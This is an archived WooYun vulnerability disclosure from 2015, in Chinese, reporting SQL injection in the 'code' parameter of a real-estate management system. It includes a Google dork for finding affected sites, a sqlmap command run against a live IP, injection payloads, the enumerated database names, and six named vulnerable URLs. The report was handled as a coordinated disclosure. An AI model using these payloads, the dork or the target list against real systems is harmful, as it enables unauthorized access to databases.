当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111342

漏洞标题:某房地产管理系统Sql注入

相关厂商:房地产

漏洞作者: 路人甲

提交时间:2015-05-05 10:47

修复时间:2015-08-06 18:44

公开时间:2015-08-06 18:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-05: 细节已通知厂商并且等待厂商处理中
2015-05-08: 厂商已经确认,细节仅向厂商公开
2015-05-11: 细节向第三方安全合作伙伴开放
2015-07-02: 细节向核心白帽子及相关领域专家公开
2015-07-12: 细节向普通白帽子公开
2015-07-22: 细节向实习白帽子公开
2015-08-06: 细节向公众公开

简要描述:

rt

详细说明:

inurl:Public/project/ProjectInfo.aspx 谷歌关键词
找到约 60,600 条结果


随便拿一个来测试。

D:\Python27\sqlmap>sqlmap.py -u "http://61.184.82.181:8088/Public/project/Projec
tInfo.aspx?code=717" --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150319}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 19:10:02
[19:10:02] [INFO] resuming back-end DBMS 'microsoft sql server'
[19:10:02] [INFO] testing connection to the target URL
[19:10:14] [WARNING] reflective value(s) found and filtering out
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: code (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: code=717 AND 6508=6508
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: code=717;WAITFOR DELAY '0:0:5'--
---
[19:10:14] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[19:10:14] [INFO] fetching database names
[19:10:14] [INFO] fetching number of databases
[19:10:14] [INFO] resumed: 19
[19:10:14] [INFO] resumed: bmf2008
[19:10:14] [INFO] resumed: CQCJZDGXXTBZDB
[19:10:14] [INFO] resumed: CQJYJDAGLXTDB
[19:10:14] [INFO] resumed: emfdoc
[19:10:14] [INFO] resumed: emffiles
[19:10:14] [INFO] resumed: emftran
[19:10:14] [INFO] resumed: HISWXZJV2
[19:10:14] [INFO] resumed: master
[19:10:14] [INFO] resumed: model
[19:10:14] [INFO] resumed: msdb
[19:10:14] [INFO] resumed: publicuser
[19:10:14] [INFO] resumed: ReportServer
[19:10:14] [INFO] resumed: ReportServerTempDB
[19:10:14] [INFO] resumed: tempdb
[19:10:14] [INFO] resumed: toshape
[19:10:14] [INFO] resumed: wsba
[19:10:14] [INFO] resumed: wsbalog
[19:10:14] [INFO] resumed: wxzj
[19:10:14] [INFO] resumed: wxzjlog
available databases [19]:
[*] bmf2008
[*] CQCJZDGXXTBZDB
[*] CQJYJDAGLXTDB
[*] emfdoc
[*] emffiles
[*] emftran
[*] HISWXZJV2
[*] master
[*] model
[*] msdb
[*] publicuser
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] toshape
[*] wsba
[*] wsbalog
[*] wxzj
[*] wxzjlog
[19:10:14] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\61.184.82.181'
[*] shutting down at 19:10:14


谷歌随便找的几个案例
http://61.184.82.181:8088/Public/project/ProjectInfo.aspx?code=717
http://ytfcjy.com/public/project/ProjectInfo.aspx?code=883
http://www.smfdc.com.cn:8080/public/project/ProjectInfo.aspx?code=265681
http://www.hbczfdc.com:82/public/project/ProjectInfo.aspx?code=1435
http://218.22.238.90:8888/Public/project/ProjectInfo.aspx?code=1073
http://www.ytfcjy.com/public/project/ProjectInfo.aspx?code=1633

漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-05-08 18:43

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无